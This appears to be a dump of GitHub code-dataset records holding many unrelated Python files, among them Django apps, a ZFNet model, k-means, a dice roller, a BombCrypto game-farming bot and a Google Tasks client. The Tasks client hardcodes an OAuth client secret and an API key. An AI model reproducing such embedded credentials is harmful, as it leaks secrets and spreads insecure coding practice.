b_l2\n","repo_name":"champax/pysolcache","sub_path":"pysolcache/HighCache.py","file_name":"HighCache.py","file_ext":"py","file_size_in_byte":4687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41699565413","text":"#This file enables populating dividends.sqlite\nimport sqlite3\nimport json\nimport numpy as np\nimport os\n\ndef run_sqlite(scriptDirectory):\n\tsql_create_projects_table = ''' CREATE TABLE IF NOT EXISTS repo_schedules \n\t\t\t\t\t\t\t\t\t (indice text, t1 real, t2 real, t3 real, t4 real, t5 real, t6 real, t7 real, t8 real, t9 real, t10 real, t11 real, t12 real, t13 real, t14 real, date text); '''\n\n\tsql_insert_repo = ''' INSERT INTO repo_schedules(indice,t1,t2,t3,t4,t5,t6,t7,t8,t9,t10,t11,t12,t13,t14,date) VALUES(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?) '''\n\n\n\tconn = sqlite3.connect(os.path.join(scriptDirectory, 'output', 'repo.sqlite'))\n\tc = conn.cursor()\n\tc.execute(sql_create_projects_table)\n\n\t#inserting data in the table \n\tuniverse = None\n\twith open(os.path.join(scriptDirectory, 'output/universe_repo_cleaned.json'), 'r') as f:\n\t\tuniverse = json.load(f)\n\tvalues = np.array(list(universe.values()))[:,1]\n\tdates = np.array(list(universe.values()))[:,2]\n\tdates = dates.reshape((len(dates),1)) \n\tindexes = np.array(list(universe.keys()))\n\tindexes = indexes.reshape((len(indexes),1))\n\trepo_schedules = np.column_stack((indexes,values,dates))\n\n\tfor i,div_schedule in enumerate(repo_schedules):\n\t\tindice = div_schedule[0]\n\t\tdate = div_schedule[2]\n\t\t#SHANGHAI SE 50 is deleted\n\t\tif(indice!=\"SHANGHAI SE 50\"):\n\t\t\tT1 = div_schedule[1][0]\n\t\t\tT2 = div_schedule[1][1]\n\t\t\tT3 = div_schedule[1][2]\n\t\t\tT4 = div_schedule[1][3]\n\t\t\tT5 = div_schedule[1][4]\n\t\t\tT6 = div_schedule[1][5]\n\t\t\tT7 = div_schedule[1][6]\n\t\t\tT8 = div_schedule[1][7]\n\t\t\tT9 = div_schedule[1][8]\n\t\t\tT10 = div_schedule[1][9]\n\t\t\tT11 = div_schedule[1][10]\n\t\t\tT12 = div_schedule[1][11]\n\t\t\tT13 = div_schedule[1][12]\n\t\t\tT14 = div_schedule[1][13]\n\n\t\t\tc.execute(sql_insert_repo,(indice,T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,date))\n\n\tconn.commit()\n\tconn.close()","repo_name":"mChataign/smileCompletion","sub_path":"adam_api_repo_curve_anomaly_detection/script_sql/sqlite_populate.py","file_name":"sqlite_populate.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"7561184206","text":"import os, sys\nfrom django.conf import settings\n\nDIRNAME = os.path.dirname(__file__)\nsettings.configure(DEBUG=True,\n DATABASES={\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n }\n },\n #ROOT_URLCONF='myapp.urls',\n CMS_TEMPLATES = ( ('template_for_tests.html', 'Test template'), ),\n CMS_MODERATOR = False,\n CMS_PERMISSION = False,\n TEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.request',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'cms.context_processors.media',\n 'sekizai.context_processors.sekizai',\n ),\n INSTALLED_APPS = (\n #'cmsplugin-rt.cmsplugin_rt',\n 'cmsplugin_rt',\n 'cmsplugin_rt.button',\n #'cmsplugin_rt.facebook_button',\n #'cmsplugin_rt.hbar',\n #'cmsplugin_rt.mailchimp_form',\n #'cmsplugin_rt.meta_icons',\n #'cmsplugin_rt.open_graph',\n #'cmsplugin_rt.resizeable_picture',\n #'cmsplugin_rt.self_calc_pagination',\n #'cmsplugin_rt.spacer',\n #'cmsplugin_rt.style_modifier',\n #'cmsplugin_rt.text_minimal_markup',\n #'cmsplugin_rt.twitter_button',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.admin',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n #'django.contrib.markup',\n 'south',\n 'cms',\n 'mptt',\n 'menus',\n 'sekizai',\n 'cms.plugins.file',\n 'cms.plugins.link',\n 'cms.plugins.picture',\n 'cms.plugins.text',\n 'cms.plugins.video',\n ),\n )\n\n\n#from cms.test_utils.util.context_managers import SettingsOverride\n\nfrom django.test.simple import DjangoTestSuiteRunner\ntest_runner = DjangoTestSuiteRunner(verbosity=2)\nfailures = test_runner.run_tests(['cmsplugin_rt', ])\nif failures:\n sys.exit(failures)\n","repo_name":"RacingTadpole/cmsplugin-rt","sub_path":"tests/runtests.py","file_name":"runtests.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"39921461961","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # PinPV Fig 1\n# \n# This journal shows how to use the Analysis function inside bifacialVF to call for PV Mismatch IV curve calculation and plotting for different irradiance values.\n# \n# Estimating and parameterizing mismatch power loss in bifacial photovoltaic systems\n# Chris Deline,Silvana Ayala Pelaez,Sara MacAlpine,Carlos Olalla\n# First published: 06 March 2020 https://doi.org/10.1002/pip.3259Citations: 16\n# \n\n# In[1]:\n\n\nimport bifacialvf\nimport pandas as pd\n\n\n# In[2]:\n\n\n# SETUP:\nCity='Cairo'\nWeatherFile = 'EGY_Cairo.Intl.Airport.623660_ETMY'\nLatitude = 30.13\nLongitude= 31.4\nTimezone = 2\nTilt = 10\nAzimuth = 180\nGroundClearance = 0.15\nRtR = 1.5\nRowType = 'interior'\nTransmissionFactor = 0.013\nCellRows = 6\nPVfrontSurface = 'glass'\nPVbackSurface = 'glass'\nAlbedo = 0.62\nTracking = False\ncalculatePVMismatch = True\nPortraitorLandscape = 'landscape'\n\n\n# In[3]:\n\n\n# PVMismatch calculation\n# BifacialVF front and rear irradiance values for June 21st. at 2 PM\nfrontGTIrow = [927.6982631, 928.4082993, 928.8050623, 931.0767397, 933.0536854, 933.8064969]\nbackGTIrow = [131.7201933, 47.90228722, 38.49283059, 54.58803934, 100.6857589, 194.5133033]\n\nportraitorlandscape='landscape'\nsensorsy=len(frontGTIrow)\ndebug=True\nnumcells=72\nplotflag = True\n\nstdpl, cellsx, cellsy = bifacialvf.analysis.setupforPVMismatch(portraitorlandscape=portraitorlandscape, sensorsy=sensorsy, numcells=numcells)\n\nPowerAveraged, PowerDetailed, sunmatAveraged, sunmatDetailed = bifacialvf.analysis.calculateVFPVMismatch(stdpl=stdpl, cellsx=cellsx, cellsy=cellsy, sensorsy=sensorsy, frontGTIrow=frontGTIrow, backGTIrow=backGTIrow, bififactor=1.0, debug=debug, plotflag = plotflag)\n\nprint(\"Results: \", round(PowerAveraged,3), round(PowerDetailed,2))\n\nprint(portraitorlandscape, \"Cellsx\", cellsx, \"Cellsy\", cellsy)\nprint(pd.DataFrame(stdpl))\nprint(pd.DataFrame(sunmatAveraged).round(3))\npd.DataFrame(sunmatDetailed).round(3)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"NREL/bifacialvf","sub_path":"docs/tutorials/(PinPV) Fig 1 IV Curves.py","file_name":"(PinPV) Fig 1 IV Curves.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"38779048466","text":"def check(m):\n # 상한액으로 지방에서 요청액을 배정가능하면 배정하고 아니면 상한액으로 합계계산\n # 합계가 총액 이하이면 성공 아니면 실패 리턴\n total = 0\n for i in range(N):\n if data[i] <= m:\n total += data[i]\n else:\n total += m\n if total <= M:\n return 1\n else:\n return 0\n\nN = int(input())\ndata = list(map(int, input().split()))\nM = int(input())\n\ne = max(data)\ns = 1\nsol = 0\nwhile s <= e:\n # 1원에서 max원까지 상한가를 mid로 결정하여 총액이하이면 상한액을 늘리고 아니면 줄임\n m = (s+e)//2\n if check(m):\n # 성공하면 상한액을 늘림\n sol = m\n s = m+1\n else:\n # 초과하면 상학액을 줄임\n e = m-1\nprint(sol)","repo_name":"woonji913/til","sub_path":"코테대비/20190328/예산.py","file_name":"예산.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12092093862","text":"from PIL.ImageOps import grayscale\r\nimport pyautogui\r\nimport time\r\nimport keyboard\r\nimport numpy as np\r\nfrom random import randint\r\nimport win32api, win32con, win32gui\r\nfrom get_window import WindowMgr\r\nimport automation\r\nimport new_map\r\nimport error\r\nimport set_window\r\nimport pygetwindow as gw #USED TO MINIMIZE WINDOWS AND SO ON\r\n\r\n\r\n## Used to get all windows titles\r\n# all_titles = gw.getAllTitles()\r\n# print(all_titles)\r\n\r\n#Titles of the browsers of each account\r\nPessoal = gw.getWindowsWithTitle('bombcrypto - Pessoal — Microsoft\\u200b Edge')[0]\r\nConta_1 = gw.getWindowsWithTitle('bombcrypto - Conta 1 — Microsoft\\u200b Edge')[0]\r\nConta_2 = gw.getWindowsWithTitle('bombcrypto - Conta 2 — Microsoft\\u200b Edge')[0]\r\nConta_3 = gw.getWindowsWithTitle('bombcrypto - Conta 3 — Microsoft\\u200b Edge')[0]\r\nConta_4 = gw.getWindowsWithTitle('bombcrypto - Conta 4 — Microsoft\\u200b Edge')[0]\r\nConta_5 = gw.getWindowsWithTitle('bombcrypto - Conta 5 — Microsoft\\u200b Edge')[0]\r\n\r\ndef minimize_browser():\r\n Pessoal.minimize()\r\n Conta_1.minimize()\r\n Conta_2.minimize()\r\n Conta_3.minimize()\r\n Conta_4.minimize()\r\n Conta_5.minimize()\r\n\r\ndef max_browser():\r\n Pessoal.restore()\r\n Conta_1.restore()\r\n Conta_2.restore()\r\n Conta_3.restore()\r\n Conta_4.restore()\r\n Conta_5.restore()\r\n\r\nstarter = int(0)\r\ntime.sleep(1)\r\n\r\n\r\n#The code is called for two browsers, based on the \"name\" of the window. Change it if needed\r\n#The script works based in images, so if your screen is different, take new prints for each image.\r\n\r\ndef f5():\r\n #reload page to start the loop\r\n #pyautogui.keyDown('ctrl') #un-comment this if you need hard-reset\r\n pyautogui.keyDown('f5')\r\n time.sleep(0.1)\r\n #pyautogui.keyUp('ctrl')\r\n pyautogui.keyUp('f5')\r\n time.sleep(5) #increase this if your connnection takes more than 7 sec to load the button\r\n\r\ndef routine(browser):\r\n minimize_browser()\r\n browser.maximize()\r\n set_window.set_browser(browser)\r\n time.sleep(0.7)\r\n #Reload the page\r\n f5()\r\n automation.automation()\r\n browser.restore()\r\n\r\ndef menu(browser):\r\n minimize_browser()\r\n browser.maximize()\r\n set_window.set_browser(browser)\r\n time.sleep(0.5)\r\n automation.back_to_menu()\r\n browser.restore()\r\n\r\n\r\ndef main():\r\n while keyboard.is_pressed('q') == False and starter == 0:\r\n#minimize all browsers\r\n \r\n\r\n routine(Pessoal)\r\n routine(Conta_1)\r\n routine(Conta_2)\r\n routine(Conta_3)\r\n routine(Conta_4)\r\n routine(Conta_5)\r\n max_browser()\r\n\r\n if error.error() == True:\r\n #Trying to find error on the screen after completing the run if true, run again\r\n print(\"Error found on the screen, maybe because of the server. Running again in 5s\")\r\n time.sleep(5)\r\n main()\r\n else:\r\n print(\"No error was found, continuing.\")\r\n #system to get to a new map\r\n #Wait one hour to rerun and make everyone go to work again\r\n for i in range(10):\r\n #Search if the map is finished > change map\r\n new_map.new_map()\r\n\r\n #Search for errors\r\n if error.error() == True:\r\n print(\"Found 'error on the screen, restarting the run\")\r\n main()\r\n else:\r\n time.sleep(randint(240, 300))\r\n new_map.new_map()\r\n menu(Pessoal)\r\n new_map.new_map()\r\n menu(Conta_1)\r\n new_map.new_map()\r\n menu(Conta_2)\r\n new_map.new_map()\r\n menu(Conta_3)\r\n new_map.new_map()\r\n menu(Conta_4)\r\n new_map.new_map()\r\n menu(Conta_5)\r\n max_browser()\r\n \r\n main()\r\nmain()","repo_name":"Octhor/cryptobomb","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8473497795","text":"from django.urls import path\n\nfrom . import views\n\napp_name = \"students\"\n\nurlpatterns = [\n path(\"\", views.StudentListView.as_view(), name=\"list\"),\n path(\"/\", views.student_card, name=\"student_card\"),\n path(\"/add_homework/\",\n views.HomeworkCreateView.as_view(),\n name=\"add_homework\"),\n path(\"/edit_homework//\",\n views.HomeworkUpdateView.as_view(),\n name=\"edit_homework\"),\n path(\"/delete_homework//\",\n views.HomeworkDeleteView.as_view(),\n name=\"delete_homework\"),\n path(\"/progress/\",\n views.ProgressListView.as_view(),\n name=\"progress\"),\n]\n","repo_name":"Rezenhorn/english_teacher","sub_path":"english/students/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"14599052635","text":"\"\"\"\nImplementation of ZFNet using Pytorch\n\"\"\"\nimport os\nimport torch\nimport torch.nn as nn\nimport matplotlib.pyplot as plt\n\n\nclass ZFNet(nn.Module):\n def __init__(self):\n super(ZFNet, self).__init__()\n self.cnn_model = nn.Sequential(\n nn.Conv2d(3, 96, kernel_size=7, stride=(4, 4)),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(96, 256, kernel_size=5, stride=(1, 1)),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(256, 512, kernel_size=3, stride=(1, 1)),\n nn.ReLU(inplace=True),\n nn.Conv2d(512, 1024, kernel_size=3, stride=(1, 1)),\n nn.ReLU(inplace=True),\n nn.Conv2d(1024, 512, kernel_size=3, stride=(1, 1)),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2)\n )\n self.fc_model = nn.Sequential(\n nn.Linear(2048, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(p=0.25, inplace=False),\n nn.Linear(4096, 1024),\n nn.ReLU(inplace=True),\n nn.Dropout(p=0.25, inplace=False),\n nn.Linear(1024, 10)\n )\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n self.path = ''\n\n def forward(self, x):\n x = self.cnn_model(x)\n x = x.view(x.size(0), -1)\n x = self.fc_model(x)\n return x\n","repo_name":"amrit-dev-20/Dev-Training-DL","sub_path":"Exercises/05_Deep_CNN_Architectures/Models/ZFNet/ZFNet.py","file_name":"ZFNet.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5906960632","text":"from app import db\n\nclass Metals(db.Model):\n __tablename__ = 'metals'\n date = db.Column(db.Date())\n code = db.Column(db.Integer())\n name = db.Column(db.String())\n buy = db.Column(db.Float())\n sell = db.Column(db.Float())\n\n def __init__(self, date, code, name, buy, sell):\n self.date = date\n self.code = code\n self.name = name\n self.buy = buy\n self.sell = sell\n\n def __repr__(self):\n return ''.format(self.id)\n \n def serialize(self):\n return {\n 'id': self.id, \n 'date': self.date,\n 'code': self.code,\n 'name':self.name,\n 'buy':self.buy,\n 'sell':self.sell\n }","repo_name":"komissarov-andrew/web-app-be","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34059438170","text":"#! /usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport gflags\nimport httplib2\n\nfrom apiclient.discovery import build\nfrom oauth2client.file import Storage\nfrom oauth2client.client import OAuth2WebServerFlow\nfrom oauth2client.tools import run\n\nclass GoTask:\n\n def __init__(self):\n \n FLAGS = gflags.FLAGS\n\n # Set up a Flow object to be used if we need to authenticate. This\n # sample uses OAuth 2.0, and we set up the OAuth2WebServerFlow with\n # the information it needs to authenticate. Note that it is called\n # the Web Server Flow, but it can also handle the flow for native\n # applications\n # The client_id and client_secret are copied from the API Access tab on\n # the Google APIs Console\n FLOW = OAuth2WebServerFlow(\n client_id='350392034727-p663o1j04sepb3ik4sp67u384o1jjee6.apps.googleusercontent.com',\n client_secret='o8V6_dLLJ-S5QKKxidE_Z0Yg',\n scope='https://www.googleapis.com/auth/tasks',\n user_agent='google-task-ui/v1')\n\n # To disable the local server feature, uncomment the following line:\n FLAGS.auth_local_webserver = False\n\n # If the Credentials don't exist or are invalid, run through the native client\n # flow. The Storage object will ensure that if successful the good\n # Credentials will get written back to a file.\n storage = Storage('tasks.dat')\n credentials = storage.get()\n if credentials is None or credentials.invalid == True:\n credentials = run(FLOW, storage)\n\n # Create an httplib2.Http object to handle our HTTP requests and authorize it\n # with our good Credentials.\n http = httplib2.Http()\n http = credentials.authorize(http)\n\n # Build a service object for interacting with the API. Visit\n # the Google APIs Console\n # to get a developerKey for your own application.\n self.service = build(serviceName='tasks', version='v1', \n http=http, developerKey='AIzaSyAwrNJT65OhdkwuxWEdh-ZUPP3kkPOk804')\n\n def list_tasklists(self):\n \"\"\"List an user's all tasklists\n\n \"\"\"\n response = self.service.tasklists().list().execute()\n return response['items']\n\n def rename_tasklist(self, tasklist, new_name):\n \"\"\"Rename the specified tasklist\n\n \"\"\"\n tasklist['title'] = new_name\n result = self.service.tasklists().update(tasklist=tasklist['id'], body=tasklist).execute()\n if result['title'] == new_name:\n return True\n else:\n return False\n\n def del_tasklist(self, tasklist_id):\n \"\"\"Delete the specified tasklist\n\n \"\"\"\n self.service.tasklists().delete(tasklist=tasklist_id).execute()\n \n def new_tasklist(self, tasklist_title):\n \"\"\"Create a new tasklist\n\n \"\"\"\n new_tasklist = {\n 'title': tasklist_title\n }\n result = self.service.tasklists().insert(body=new_tasklist).execute()\n return result['id']\n \n def list_tasks(self, tasklist_id):\n tasks = self.service.tasks().list(tasklist=tasklist_id).execute()\n if 'items' in tasks:\n return tasks['items']\n else:\n return []\n\n def new_task(self, tasklist_id, task):\n result = self.service.tasks().insert(tasklist=tasklist_id, body=task).execute()\n\n def del_task(self, tasklist_id, task_id):\n self.service.tasks().delete(tasklist=tasklist_id, task=task_id).execute()\n\n def complete_task(self, tasklist_id, task):\n task['status'] = 'completed'\n result = self.service.tasks().update(tasklist=tasklist_id, task=task['id'], body=task).execute()\n return result\n\n def uncomplete_task(self, tasklist_id, task):\n if task['status'] == 'completed':\n task['status'] = 'needsAction'\n task.pop('completed', None)\n result = self.service.tasks().update(tasklist=tasklist_id, task=task['id'], body=task).execute()\n return result\n else:\n return task\n \n def move_task(self, tasklist_id, task_id_curr, task_id_pre=''):\n self.service.tasks().move(tasklist=tasklist_id, task=task_id_curr, previous=task_id_pre).execute()\n \n def update_task(self, tasklist_id, task):\n self.service.tasks().update(tasklist=tasklist_id, task=task['id'], body=task).execute()\n\n def clear_task(self, tasklist_id):\n self.service.tasks().clear(tasklist=tasklist_id).execute()\n","repo_name":"ks1024/google-task-ui","sub_path":"gtask-ui/gotask.py","file_name":"gotask.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24106793168","text":"import pandas as pd\nimport numpy as np\n\ndef pre_load_save():\n # load data\n # DIM_x x=0,1,2,...,99\n # PID\n origin_data = pd.read_csv('course1.csv')\n origin_mat = np.array(origin_data)[:, 1:]\n np.save('course1.npy',origin_mat)\n\ndef dist(vec1,vec2):\n return np.sqrt(sum(np.power(vec1-vec2,2)))\n\n\ndef createCent(data,k):\n d = data.shape[1]\n tmp = np.zeros((k,d))\n for j in range(d):\n minJ = min(data[:,j])\n ranJ = float(max(data[:,j])-minJ)\n tmp[:,j] = minJ + ranJ * np.random.rand(k)\n\n return tmp\n\ndef main():\n # pre_load_save()\n data = np.load(\"course1.npy\")\n # print(data.shape)\n # print(data[0]) # (50000, 100)\n N = data.shape[0]\n k = 5\n # generate the random start points\n centriods = createCent(data,k)\n # print(centriods)\n\n cluster_D = np.zeros((N,2))\n\n loop_cnt = 0\n flag = True\n while flag:\n flag =False\n loop_cnt +=1\n # update the centriods\n new_cent = np.zeros((k, data.shape[1]))\n cnt = np.zeros(k)\n\n for i in range(N):\n minDist = np.inf\n minIndex = -1\n for j in range(k):\n distIJ = dist(data[i],centriods[j])\n if distIJ maxDist[int(cluster_D[i][0])]:\n maxDist[int(cluster_D[i, 0])] = cluster_D[i, 1]\n\n print(maxDist)\n # [4.65689107 4.17089356 4.93819354 5.55143208 5.55468786]\n # [3,4,2,1,0]\n\n rev = [1, 0, 2, 3, 4]\n fin = []\n\n for i in range(N):\n fin.append(int(rev[int(cluster_D[i][0])]))\n\n data1 = pd.DataFrame(fin)\n data1.to_csv('fin.csv')\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"KirinoMao/EE226_datamining","sub_path":"HW1/kmeans_m.py","file_name":"kmeans_m.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24773544545","text":"from random import randint\n\ndef roll(num, size):\n \"\"\"Returns the cumulative total of num rolls of die size. A regular dnd\n roll, and a location roll.\"\"\"\n\n results = 0\n\n for i in range(0, num):\n results += randint(1, size)\n\n return results\n\n\ndef roll_damage(num, size):\n \"\"\"Returns the cumulative total of num rolls of die size with raises. A\n damage roll.\"\"\"\n\n results = 0 \n\n for i in range(0, num):\n r = roll(num, size)\n while r == size:\n results += r\n r = roll(1, size)\n results += r\n\n return results\n\n\ndef roll_skill(num, size):\n \"\"\"Returns the highest roll of num rolls of die size with raises and bust\n checking. Bust will return 0. A skill roll.\"\"\"\n\n results = []\n busts = 0\n result = 0\n\n for i in range(0, num):\n r = roll(1, size)\n if r == 1:\n busts += 1\n result = r\n elif r == size:\n while (r == size):\n result += r\n r = roll(1, size)\n else:\n result = r\n results.append(result)\n\n if busts >= num/2:\n return 0\n else:\n return max(results)\n\n\ndef roll_wind(num, size):\n \"\"\"Returns the highest roll of num rolls of die size with raises. A wind\n roll.\"\"\"\n\n results = []\n result = 0\n\n for i in range(0, num):\n r = roll(1, size)\n if r == size:\n while (r == size):\n result += r\n r = roll(1, size)\n else:\n result = r\n results.append(result)\n\n else:\n return max(results)\n","repo_name":"TwinHits/pydeadlands","sub_path":"dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29572015052","text":"from django.db import models\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom django.utils.text import slugify\n\n# pip install misaka\nimport misaka\n\nfrom club_accounts.models import Club_User\n#from user_accounts.models import User\n\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\n#choices for specifying event creator type\nevent_creator_type_choices =(\n (\"user\",\"Created by Student\"),\n (\"club_user\",\"Created by Club\")\n)\n\n#choices when user subscribes for an event\nevent_category_choices_prior = (\n (\"red\", \"Will be Going\"),\n (\"yellow\", \"Intrested\"),\n (\"green\", \"Not Going\")\n)\n\n#choices when an event starts\nevent_category_choices_posterior = (\n (\"white\", \"Attended\"),\n (\"black\", \"Did not Attend\"),\n (\"grey\", \"I Do not Know\")\n)\n\n\nclass Event(models.Model):\n \n event_name = models.CharField(max_length=255, unique=False)\n created_at = models.DateTimeField(auto_now=True)\n start_time = models.DateTimeField()\n end_time = models.DateTimeField() \n event_coordinator = models.ForeignKey(User, related_name=\"event_coordi\", on_delete=models.CASCADE)\n description = models.TextField()\n description_html = models.TextField(editable=False)\n\n #slug = models.SlugField(allow_unicode=True, unique=True) #used for making custom url with event name\n\n #event_creator_type = models.CharField(editable=False, choices=event_creator_type_choices)\n #event_club = models.ForeignKey(Club_User, editable= False, related_name=\"event_by_club\", on_delete=models.CASCADE, null=True, blank=True)\n \n #event_subcription_category = models.CharField(editable=False, choices=event_category_choices_prior, blank=True)\n #subscribed_event_attendance = models.CharField(editable=False, choices=event_category_choices_posterior, blank=True)\n\n #subscribers = models.ManyToManyField(User,through=\"Event_Subscriber\")\n\n\n def __str__(self):\n return self.event_name\n\n def save(self, *args, **kwargs):\n #self.slug = slugify(self.event_name)\n self.description_html = misaka.html(self.description)\n super().save(*args, **kwargs)\n\n def get_absolute_url(self):\n return reverse(\n \"events:single\", #detailed view of the event when opened by user to check details or subcribe\n kwargs={\n #\"username\": self.event_coordinator.username, #event_coordi username\n \"pk\": self.pk #primary key of event\n }\n )\n\n def is_past(self):\n if timezone.now() > self.end_time:\n return True\n return False\n\n\n\n class Meta:\n ordering = [\"-created_at\"]\n unique_together = [\"event_name\", \"event_coordinator\"]\n #below code to be used if working with \"event_club\" also as a relation\n #constraints = [\n # UniqueConstraint(fields=[\"event_name\", \"event_coordinator\", \"event_club\"],\n # name='unique_with_club_event'),\n # UniqueConstraint(fields=[\"event_name\", \"event_coordinator\"],\n # condition=Q(optional=None),\n # name='unique_without_club_event'),\n #]\n\n\n\n\n\n\"\"\"\nclass Event_Subscriber(models.Model):\n #created event_name to link to users --refrencing will be this when accesing Event_Member: event_name belong to Event table \n event_name = models.ForeignKey(Event,related_name='event_subcriptions',on_delete=models.CASCADE) \n \n #created users to link to event_name --refrencing will be this when accesing Event_Member: users belong User table \n users = models.ForeignKey(User,related_name='user_subscribed_events',on_delete=models.CASCADE)\n\n def __str__(self):\n return self.users.username\n\n class Meta:\n unique_together = (\"event_name\", \"users\") #set the link\n\"\"\"","repo_name":"B1-004/Atmanirbhar","sub_path":"atmanirbhar_main_app/events/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1932313388","text":"import os\nfrom unittest import TestCase\n\nfrom hca_ingest.importer.submission.entity import Entity\nfrom hca_ingest.importer.submission.entity_map import EntityMap\nfrom tests.utils import load_json\n\n\nclass EntityMapTest(TestCase):\n def setUp(self) -> None:\n self.script_dir = os.path.dirname(__file__)\n self.json_dir = os.path.join(self.script_dir, 'spreadsheet_json')\n\n def test_load(self):\n # given:\n spreadsheet_json = load_json(f'{self.json_dir}/sample_spreadsheet.json')\n\n # when:\n entity_map = EntityMap.load(spreadsheet_json)\n\n # then:\n self.assertEqual(['project', 'biomaterial', 'file', 'protocol'],\n list(entity_map.get_entity_types()))\n\n # and:\n # TODO shouldn't entity id's be unique and that there's no need to specify entity type?\n biomaterial1 = entity_map.get_entity('biomaterial', 'biomaterial_id_1')\n self._assert_correct_entity(biomaterial1, entity_id='biomaterial_id_1',\n entity_type='biomaterial', content={'key': 'biomaterial_1'})\n\n # and:\n biomaterial2 = entity_map.get_entity('biomaterial', 'biomaterial_id_2')\n links = {'biomaterial': ['biomaterial_id_1'], 'process': ['process_id_1']}\n self._assert_correct_entity(biomaterial2, entity_id='biomaterial_id_2',\n entity_type='biomaterial', content={'key': 'biomaterial_2'},\n links=links)\n\n # and:\n protocol1 = entity_map.get_entity('protocol', 'protocol_id_1')\n self.assertEqual({'key': 'protocol_1'}, protocol1.content)\n\n def test_load__is_linking_reference(self):\n # given:\n spreadsheet_json = {\n 'biomaterial': {\n 'biomaterial_id': {\n 'content': {\n 'key': 'biomaterial_3'\n },\n 'links_by_entity': {\n 'biomaterial': ['biomaterial_id_2'],\n 'process': ['process_id_2']\n },\n 'external_links_by_entity': {\n 'biomaterial': ['biomaterial_uuid']\n },\n\n },\n }\n }\n\n # when:\n entity_map = EntityMap.load(spreadsheet_json)\n\n # then:\n self.assertEqual(['biomaterial'], list(entity_map.get_entity_types()))\n\n def test_load__is_reference(self):\n # given:\n spreadsheet_json = {\n 'biomaterial': {\n 'biomaterial_uuid': {\n 'content': {\n 'key': 'value'\n },\n 'is_reference': True\n }\n }\n }\n\n # when:\n entity_map = EntityMap.load(spreadsheet_json)\n\n # then:\n self.assertEqual(['biomaterial'], list(entity_map.get_entity_types()))\n\n def _assert_correct_entity(self, entity, entity_id='', content={}, entity_type='', links={}):\n self.assertTrue(entity)\n self.assertEqual(entity_id, entity.id)\n self.assertEqual(content, entity.content)\n self.assertEqual(entity_type, entity.type)\n self.assertEqual(links, entity.links_by_entity)\n\n def test_count_total(self):\n # given:\n zero_map = EntityMap()\n\n # and:\n one_map = EntityMap()\n one_map.add_entity(Entity('product', 'product_1', {}))\n\n # and:\n three_map = EntityMap()\n three_map.add_entity(Entity('profile', 'profile_1', {}))\n for product_id in range(0, 2):\n three_map.add_entity(Entity('product', f'product_{product_id}', {}))\n\n # expect:\n self.assertEqual(0, zero_map.count_total())\n self.assertEqual(1, one_map.count_total())\n self.assertEqual(3, three_map.count_total())\n\n def test_count_links(self):\n entity_map = EntityMap()\n\n # no element\n self.assertEqual(entity_map.count_links(), 0)\n\n # has 1 element without links\n entity_map.add_entity(Entity('product', 'product_0', {}))\n self.assertEqual(entity_map.count_links(), 0)\n\n # has 1 element with links\n entity_map.add_entity(Entity('product', 'product_1', {}, direct_links=[{}, {}, {}]))\n self.assertEqual(entity_map.count_links(), 3)\n\n # has many element with links\n entity_map.add_entity(Entity('product', 'product_2', {}, direct_links=[{}, {}, {}, {}]))\n self.assertEqual(entity_map.count_links(), 7)\n\n def test_get_project__returns_project(self):\n # given\n entity_map = EntityMap()\n project_entity = Entity('project', 'project_0', {})\n entity_map.add_entity(project_entity)\n\n # when\n output = entity_map.get_project()\n\n # then\n 